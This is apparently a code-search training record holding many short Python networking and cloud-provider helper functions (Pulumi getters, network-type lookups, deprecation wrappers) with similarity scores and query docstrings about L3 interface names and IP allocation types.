"def instance_charge_type(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def get_plugin_description(self):\n return (\"BGP dynamic routing service for announcement of next-hops \"\n \"for private networks and floating IP's host routes.\")",
"def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")",
"def get_plugin_description(self):\n return constants.L2_GATEWAY_SERVICE_PLUGIN",
"def update_network_plugin_settings(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n network_plugin_mode = self.context.get_network_plugin_mode()\n if network_plugin_mode:\n mc.network_profile.network_plugin_mode = network_plugin_mode\n\n (\n pod_cidr,\n _,\n _,\n _,\n _\n ) = self.context.get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy()\n\n network_dataplane = self.context.get_network_dataplane()\n if network_dataplane:\n mc.network_profile.network_dataplane = network_dataplane\n\n if pod_cidr:\n mc.network_profile.pod_cidr = pod_cidr\n return mc",
"def test_support_NETWORK(self):\n self.assertEqual(self._parseFeature(\"NETWORK\", \"IRCNet\"), \"IRCNet\")",
"def spec(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def server_type_name(self):\n ...",
"def _get_nets_other(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_other() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_other().')\n return self.get_nets_other(*args, **kwargs)",
"def affectedNet(*args, name: Union[AnyStr, bool]=\"\", type: AnyStr=\"\", q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def get_ui_field_behaviour() -> Dict:\n return {\n \"hidden_fields\": ['schema', 'port', 'extra', 'host'],\n \"relabeling\": {\n 'login': 'Fivetran API Key',\n 'password': 'Fivetran API Secret',\n },\n \"placeholders\": {\n 'login': 'api key',\n 'password': 'api secret',\n },\n }",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def backend_info(self):\n\t\treturn {'valid': False}",
"def no_device(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"no_device\")",
"def get_connection_form_widgets() -> dict:\n from wtforms import StringField\n from flask_appbuilder.fieldwidgets import BS3TextFieldWidget\n\n return {\n \"extra__ewah_metabase__http_string\": StringField(\n \"Use http instead of https?\",\n widget=BS3TextFieldWidget(),\n )\n }",
"def _get_nets_lacnic(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_lacnic() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_lacnic().')\n return self.get_nets_lacnic(*args, **kwargs)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def networkInfo(self):\n assert False, \"Deriving class must implement\"",
"def network(self):\n return self._network",
"def network(self):\n return self._network"
] | [
"0.6210376",
"0.5869546",
"0.56280184",
"0.5598459",
"0.5410468",
"0.5071059",
"0.5071059",
"0.49506718",
"0.4947999",
"0.4947999",
"0.4933722",
"0.48782876",
"0.48782876",
"0.48722976",
"0.48536256",
"0.48370484",
"0.4830587",
"0.48199967",
"0.47548893",
"0.47461218",
"0.4742187",
"0.4742187",
"0.4742187",
"0.4742187",
"0.4742187",
"0.47228116",
"0.4718932",
"0.4709614",
"0.47058436",
"0.47058436",
"0.47057506",
"0.470357",
"0.47027013",
"0.46833074",
"0.46810114",
"0.46810114",
"0.46685338",
"0.46415558",
"0.46412367",
"0.46386924",
"0.46350864",
"0.46277723",
"0.46200517",
"0.46133053",
"0.46007362",
"0.45920748",
"0.45888147",
"0.458866",
"0.45826578",
"0.45826578",
"0.45826578",
"0.45784494",
"0.45585415",
"0.45572534",
"0.4556415",
"0.4555404",
"0.45422706",
"0.4538289",
"0.4524146",
"0.45234737",
"0.45215735",
"0.4521274",
"0.45179993",
"0.45156115",
"0.45086312",
"0.45086312",
"0.45085144",
"0.45082542",
"0.45071143",
"0.45057335",
"0.45041972",
"0.45024002",
"0.45016608",
"0.449903",
"0.449903",
"0.44292885",
"0.44253752",
"0.44236755",
"0.4419574",
"0.44128957",
"0.44118938",
"0.44092673",
"0.44032365",
"0.4396175",
"0.4381917",
"0.43787315",
"0.4373876",
"0.43719837",
"0.43702766",
"0.43654287",
"0.43649706",
"0.4363567",
"0.43633303",
"0.4357884",
"0.43523285",
"0.43490407",
"0.4345067",
"0.43443552",
"0.43397117",
"0.43387595",
"0.43387595"
] | 0.0 | -1 |
The default interface name for this L3 network in the virtual machine. This name can be overridden by the name supplied in the network attachment configuration of that virtual machine. | def interface_name(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "interface_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def interface_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"interface_name\")",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def interface_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"interface_name\")",
"def network_interface_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_interface_id\")",
"def get_interface_name():\n interface_name = ''\n interfaces = psutil.net_if_addrs()\n for name, details in interfaces.items():\n for detail in details:\n if detail.family == socket.AF_INET:\n ip_address = ipaddress.ip_address(detail.address)\n if not (ip_address.is_link_local or ip_address.is_loopback):\n interface_name = name\n break\n return interface_name",
"def _get_interface_name(self):\n return self.__interface_name",
"def getDefaultLayerName(self):\n\t\treturn self._fileSystem.getDefaultLayerName()",
"def _get_ifname(self, intf_type, interface):\n if intf_type == 'port':\n ifname = 'Ethernet' + str(interface)\n elif intf_type == 'portchannel':\n ifname = 'po' + str(interface)\n else:\n raise Exception(\"Unknown interface type: \" + intf_type)\n\n return ifname",
"def get_logical_ifname(self, interface_name, proto='provision'): # pragma: no cover\n output = check_output(['uci', 'show', 'network'])\n network_list = output.strip().split('\\n')\n for config in network_list:\n cfg, option = config.split('=')\n net_prex = cfg.split(\".\")\n if net_prex[-1] == \"proto\" and str(option) != proto:\n ifname = '.'.join(net_prex[:-1]) + '.ifname'\n interface = check_output(['uci', 'get', ifname]).split('\\n')[0]\n if interface == interface_name:\n return net_prex[1]\n return ''",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def get_interface_name(self, network, port=None):\n if not port:\n device_id = self.get_device_id(network)\n port = self.plugin.get_dhcp_port(network.id, device_id)\n return self.driver.get_device_name(port)",
"def getDefaultName(self): # real signature unknown; restored from __doc__\n pass",
"def network_interface(self): \n return self._network_interface",
"def default_ip(ifname):\n ipr = IPRoute()\n index = ipr.link_lookup(ifname=ifname)[0]\n addr = ipr.get_addr(index=index)[0]\n interface = ipaddress.ip_interface('{}/{}'.format(addr.get_attr('IFA_ADDRESS'), addr['prefixlen']))\n addr = interface.ip + 1\n if addr in interface.network:\n return str(addr)\n raise TypeError(f'Unable to calculate default node ip in {ifname} ({interface})')",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def GetInterface(self):\n ifname = self.interface_watcher.get_last_ifname()\n if ifname is None:\n ifname = ''\n logger.debug('Replying \"' + ifname + '\" to D-Bus request GetInterface')\n return ifname",
"def get_default_iface_name_linux():\n route = \"/proc/net/route\"\n with open(route) as f:\n for line in f.readlines():\n try:\n iface, dest, _, flags, _, _, _, _, _, _, _, = line.strip().split()\n if dest != '00000000' or not int(flags, 16) & 2:\n continue\n return iface\n except:\n continue",
"def get_default_ip():\r\n if CONFIG.BIND_INTERFACE is None:\r\n default_gw = netifaces.gateways()['default']\r\n if netifaces.AF_INET in default_gw:\r\n preferred_interface = default_gw[netifaces.AF_INET][1]\r\n else:\r\n interfaces = netifaces.interfaces()\r\n preferred_interface = next((i for i in interfaces if i != 'lo'), interfaces[0])\r\n else:\r\n preferred_interface = CONFIG.BIND_INTERFACE\r\n return netifaces.ifaddresses(preferred_interface)[netifaces.AF_INET][0]['addr']",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def default_name(self):\n return '[' + self.__class__.__name__ + ']'",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def interviewer_name_default(self, interviewer_name_default):\n\n self._interviewer_name_default = interviewer_name_default",
"def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_default_gateway(self):\n return self.mycam.devicemgmt.GetNetworkDefaultGateway()",
"def get_name(self):\n \n return 'Socket/IP'",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def get_interface(self, ifname):\n \n return self._ifname",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def get_default_ip_address():\r\n gws = netifaces.gateways() # get all gateways\r\n default = gws['default'] # get the default gw\r\n adapter = default[2][1] # get the adapter identifier\r\n realadapter = netifaces.ifaddresses(adapter) # get the adapter\r\n addr_dict = realadapter[2][0] # get the first ipv4 address tuple\r\n return addr_dict['addr']",
"def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def default_interface(dut,**kwargs):\n cli_type = st.get_ui_type(dut, **kwargs)\n\n if 'interface' not in kwargs:\n st.error(\"Mandatory arg interface is not present\")\n return False\n else:\n interface = kwargs['interface']\n\n skip_error = kwargs.pop('skip_error', False)\n command = ''\n\n if cli_type == 'klish':\n if 'range' in kwargs:\n command = command + \"\\n\" + \"default interface range {}\".format(interface)\n else:\n command = command + \"\\n\" + \"default interface {}\".format(interface)\n else:\n st.error(\"Invalid cli_type for this API - {}.\".format(cli_type))\n return False\n\n st.config(dut, command, type='klish',skip_error_check=skip_error)\n return True",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n if self._name == '':\n return self.default_name\n else:\n return self._name",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def test_get_default_network(self):\n pass",
"def get_interface(\n network: Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface, str], index: int\n) -> Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface]:\n if isinstance(network, str):\n network = ipaddress.ip_network(network)\n\n host = network[index]\n return ipaddress.ip_interface(f\"{host}/{network.prefixlen}\")",
"def default_label(self) -> str:\n return self.settings[\"default_label\"]",
"def attached_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"attached_network_id\")",
"def GetWirelessInterface(self):\n return str(self.wifi.wireless_interface)",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_interface_name(self, device, ipaddress, parser_obj=None):\n\n # Calling parser\n try:\n parsed_output = parser_obj.parse(ip=ipaddress)\n except SchemaEmptyParserError:\n # We are looping over all the ips provided in the testbed yaml file\n # Show command output will be empty in some cases.\n return None\n\n # Get the corresponding interface name\n for intf in parsed_output['interface'].keys():\n # Parser structure only has one interface\n interface_name = intf\n\n return interface_name",
"def set_interface(interface, name=''):\n if not interface:\n raise ValueError('interface is empty')\n\n global interfaces\n logger.debug('connection_name: \"{}\" -> {}.{}'.format(\n name,\n interface.__module__,\n interface.__class__.__name__\n ))\n interfaces[name] = interface",
"def get_default_vnchost_name(self):\n\t\treturn call_sdk_function('PrlDispCfg_GetDefaultVNCHostName', self.handle)",
"def network_fabric_controller_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_fabric_controller_name\")",
"def convert_interface_name(self, s):\n match = self.rx_interface_name.match(s)\n if not match:\n return s\n else:\n return \"DryContact %s\" % s",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def filename(self):\n return f'{self._peer.interface}.conf'",
"def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname",
"def nw_name(self):\n return self._nw_name",
"def _iface_type(self, if_name):\n\n if if_name.lower().startswith('gi'):\n if_type = 'GigabitEthernet'\n elif if_name.lower().startswith('ten'):\n if_type = 'Ten-GigabitEthernet'\n elif if_name.lower().startswith('fo'):\n if_type = 'FortyGigE'\n elif if_name.lower().startswith('vl'):\n if_type = 'Vlan-interface'\n elif if_name.lower().startswith('lo'):\n if_type = 'LoopBack'\n elif if_name.lower().startswith('br'):\n if_type = 'Bridge-Aggregation'\n elif if_name.lower().startswith('ro'):\n if_type = 'Route-Aggregation'\n elif if_name.lower().startswith('tu'):\n if_type = 'Tunnel'\n elif if_name.lower().startswith('tw'):\n if_type = 'TwentyGigE'\n elif if_name.lower().startswith('hu'):\n if_type = 'HundredGigE'\n else:\n if_type = None\n\n number_list = if_name.split(' ')\n if len(number_list) == 2:\n number = number_list[-1].strip()\n else:\n number = self._get_number(if_name)\n\n if if_type:\n proper_interface = if_type + number\n else:\n proper_interface = if_name\n\n return proper_interface, if_type",
"def renameIface(self, station, nextWlan, iface):\n iface = iface[:-1]\n station.cmd('ip link set dev %s name %s-wlan%s' % (iface, station, nextWlan))\n station.cmd('ifconfig %s-wlan%s up' % (station, nextWlan))",
"def Name(self, default=None):\n return self.data.get('name', default)",
"def default_namespace(self) -> Optional[str]:\n return self.schema.namespaces.get('')",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def default_docker_pull_conn_name(self) -> str:\n return self._default_docker_pull_conn_name",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def __str__(self):\n \n return self.net.ifconfig()",
"def interface(self):\n\n data = ['[Interface]']\n for item in INTERFACE_KEYS:\n value = getattr(self, item, None)\n if value:\n data.append(value)\n\n return '''\n'''.join(data)",
"def name(self):\n if self._name is None:\n return(self.default_name)\n else:\n return(self._name)",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def _set_interface_name(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"interface_name must be of a type compatible with union\"\"\",\n 'defined-type': \"brocade-fcoe-ext:union\",\n 'generated-type': \"\"\"YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\"\"\",\n })\n\n self.__interface_name = t\n if hasattr(self, '_set'):\n self._set()",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def name(self):\n return self._imu.IMUName()",
"def setDefaultNS(self, ns):\n self.default_ns = ns",
"def _get_ifname(self):\n return self.__ifname",
"def GetDefaultWiredNetwork(self):\n config = ConfigParser.ConfigParser()\n config.read(self.wired_conf)\n profileList = config.sections()\n for profile in profileList:\n if config.has_option(profile, \"default\"):\n if misc.to_bool(config.get(profile, \"default\")):\n return profile\n return None",
"def get_name():\n\n return 'nettools'",
"def get_default_namespace(self):\n return None",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def create_default_network(context):\n return [{\n 'type': 'templates/network.py',\n 'name': 'fc-network',\n 'properties': {\n 'resourceName': 'network',\n 'name': 'network',\n 'projectId': '$(ref.fc-project.projectId)',\n 'autoCreateSubnetworks': True,\n # We pass the dependsOn list into the network template as a\n # parameter. Deployment Manager doesn't support dependsOn for\n # template-call nodes, so we can't have this resource itself depend on\n # the project-wide resources.\n 'dependsOn': '$(ref.fc-project.resourceNames)',\n },\n }]",
"def default_docker_pull_conn_name(self, default_docker_pull_conn_name: str):\n\n self._default_docker_pull_conn_name = default_docker_pull_conn_name",
"def LegacyName(self, default=None):\n return self.data.get('legacy_name', default)",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def default_prefix(self) -> str:\n return \"\"",
"def default_prefix(self) -> str:\n return \"\"",
"def DetectWirelessInterface(self):\n iface = self.wifi.DetectWirelessInterface()\n if iface:\n print 'Automatically detected wireless interface ' + iface\n else:\n print \"Couldn't detect a wireless interface.\"\n return str(iface)",
"def iface_config(self, iface, *args, **kwargs):\n if not set(kwargs).issubset({'intf_ip_addr', 'netns', 'adminMode'}):\n raise NotImplementedError(\"Method is not implemented for current kwargs.\")\n if kwargs.get('netns', False):\n # Create network namespaces for current iface\n self.create_namespaces(iface)\n del kwargs['netns']\n if 'intf_ip_addr' in kwargs:\n kwargs['ipAddr'] = \"{}/24\".format(kwargs['intf_ip_addr'])\n if iface in self.namespaces:\n self._lhost.ui.enter_namespace(self.namespaces[iface])\n self._lhost.ui.modify_ports([iface], **kwargs)\n if iface in self.namespaces:\n self._lhost.ui.exit_namespace()",
"def guess_nic_name(self, nic_number):\n if nic_number == 1:\n return \"mgmt0\"\n else:\n return (\"Ethernet{0}/{1}\".format((nic_number - 2) // 48 + 2,\n (nic_number - 2) % 48 + 1))",
"def identity(self, default=\"\"):\n for prop in (\"standard_name\", \"grid_mapping_name\"):\n n = self.coordinate_conversion.get_parameter(prop, None)\n if n is not None:\n return f\"{prop}:{n}\"\n\n n = self.nc_get_variable(None)\n if n is not None:\n return f\"ncvar%{n}\"\n\n return default",
"def fortran_interface(self) -> str:\n return ''",
"def get_default(self, create=True):\n if self._default_network is None and create:\n log.debug(\"Creating default network...\")\n self._default_network = self.create('default', driver='bridge')\n\n return self._default_network",
"def interface(self):\n if self._interface is None:\n expression = expressions.WPA_INTERFACE\n name = expressions.INTERFACE_NAME\n command = self.interface_list_command\n self._interface = self._match(expression,\n name,\n command)\n return self._interface",
"def GetCurrentNetwork(self, iwconfig=None):\n current_network = str(self.wifi.GetCurrentNetwork(iwconfig))\n return current_network",
"def default_endpoint(self) -> str:\n return self.settings[\"default_endpoint\"]",
"def computer_network_name(self, computer_network_name: str):\n self._computer_network_name = computer_network_name",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name"
] | [
"0.6839024",
"0.67300063",
"0.6576439",
"0.6536506",
"0.63453054",
"0.62927467",
"0.6252902",
"0.6176393",
"0.6155957",
"0.6108241",
"0.61039215",
"0.60497546",
"0.5955052",
"0.5913382",
"0.5868023",
"0.5867791",
"0.586413",
"0.58365524",
"0.583649",
"0.58314383",
"0.58273387",
"0.58186436",
"0.58046484",
"0.5784699",
"0.5776711",
"0.5720125",
"0.5647284",
"0.5640018",
"0.5637313",
"0.56305647",
"0.561889",
"0.55938256",
"0.558493",
"0.55829823",
"0.5571122",
"0.5567466",
"0.5529212",
"0.5500438",
"0.5496911",
"0.5494055",
"0.548975",
"0.5480558",
"0.5475745",
"0.5456404",
"0.54428256",
"0.54394114",
"0.54204065",
"0.5420172",
"0.54072",
"0.5398958",
"0.5346724",
"0.5340946",
"0.53397155",
"0.53397155",
"0.53397155",
"0.5327861",
"0.5306521",
"0.530602",
"0.53027636",
"0.5287903",
"0.52813387",
"0.5268927",
"0.52682924",
"0.52601707",
"0.5256893",
"0.52551824",
"0.52494943",
"0.524617",
"0.5245409",
"0.52449393",
"0.5243843",
"0.523603",
"0.5222033",
"0.52203584",
"0.5213849",
"0.52113366",
"0.52052987",
"0.51949984",
"0.5178461",
"0.5178444",
"0.5177552",
"0.51700914",
"0.51669854",
"0.51565826",
"0.51543015",
"0.51543015",
"0.5149277",
"0.5148701",
"0.51458824",
"0.5141578",
"0.51363873",
"0.512817",
"0.512609",
"0.5125175",
"0.51077056",
"0.51021224",
"0.5094554",
"0.5089065",
"0.5086891",
"0.50731915"
] | 0.67675763 | 1 |
The type of the IP address allocation, defaulted to "DualStack". | def ip_allocation_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ip_allocation_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _get_address_type(self):\n return self.__address_type",
"def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))",
"def address_type(self) -> str:\n return pulumi.get(self, \"address_type\")",
"def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))",
"def ip_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_type\")",
"def ip_allocation_type(self) -> Optional[pulumi.Input[Union[str, 'IpAllocationType']]]:\n return pulumi.get(self, \"ip_allocation_type\")",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def address_type(self):\n return addresser.AddressSpace.PROPOSALS",
"def type(self):\n return BipType.get_at(self.ea)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def test_external_ip_get_kind(self):\n assert_equal(self.test_external_ip.get_kind(), 'mpexternalip')",
"def AddrType(self) -> AddrTypes:\n return self.m_addr_type",
"def get_network_type(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkType', self.handle)",
"def SocketType(self) -> SocketType:",
"def ip_protocol(self) -> str:\n protocol = f\"ipv{self.ip_address.version}\"\n\n log.debug(\"Host %s: IP protocol for paramiko is %s.\", self.host)\n return protocol",
"def get_type(self):\n types = dict(ADDRESS_TYPE_CHOICES)\n return types.get(self.address_type, \"N/A\")",
"def _address_type(self, address):\n parsed_type = None\n parsed = urlparse.urlparse(address)\n if parsed.scheme not in ('http', 'https', 'ipc', 'tcp'):\n raise ValueError('Invalid volttron central address.')\n\n return parsed.scheme",
"def outside_ip_address_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def get_ip_version(network):\r\n if netaddr.IPNetwork(network).version == 6:\r\n return \"IPv6\"\r\n elif netaddr.IPNetwork(network).version == 4:\r\n return \"IPv4\"",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def ip_allocation_method(self) -> pulumi.Input[Union[str, 'VirtualMachineIPAllocationMethod']]:\n return pulumi.get(self, \"ip_allocation_method\")",
"def get_ip_version(network):\n if netaddr.IPNetwork(network).version == 6:\n return \"IPv6\"\n elif netaddr.IPNetwork(network).version == 4:\n return \"IPv4\"",
"def address(self):\n \n return self.__ip",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]",
"def get_net_adapter_type(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetNetAdapterType', self.handle)",
"def is_ip(self) -> bool:\n return self.typ == ETH_P_IP",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def get_name(self):\n \n return 'Socket/IP'",
"def _read_proto_resolve(self, addr: 'bytes', ptype: 'int') -> 'str | IPv4Address | IPv6Address':\n if ptype == Enum_EtherType.Internet_Protocol_version_4: # IPv4\n return ipaddress.ip_address(addr)\n if ptype == Enum_EtherType.Internet_Protocol_version_6: # IPv6\n return ipaddress.ip_address(addr)\n return addr.hex()",
"def getTransportType(self):\n if type(self.segment) is TcpSegment:\n return TCP_ID\n elif type(self.segment) is UdpSegment:\n return UDP_ID\n else:\n raise Exception(\"Unexpected type of transport protocol!\")",
"def _make_proto_resolve(self, addr: 'IPv4Address | IPv6Address | str | bytes', ptype: 'int') -> 'bytes':\n if ptype == Enum_EtherType.Internet_Protocol_version_4:\n return ipaddress.IPv4Address(addr).packed\n if ptype == Enum_EtherType.Internet_Protocol_version_6:\n return ipaddress.IPv6Address(addr).packed\n\n if isinstance(addr, str):\n return addr.encode()\n if isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):\n return addr.packed\n return addr",
"def type(self):\n return self.sock.type",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def get_ip(self):",
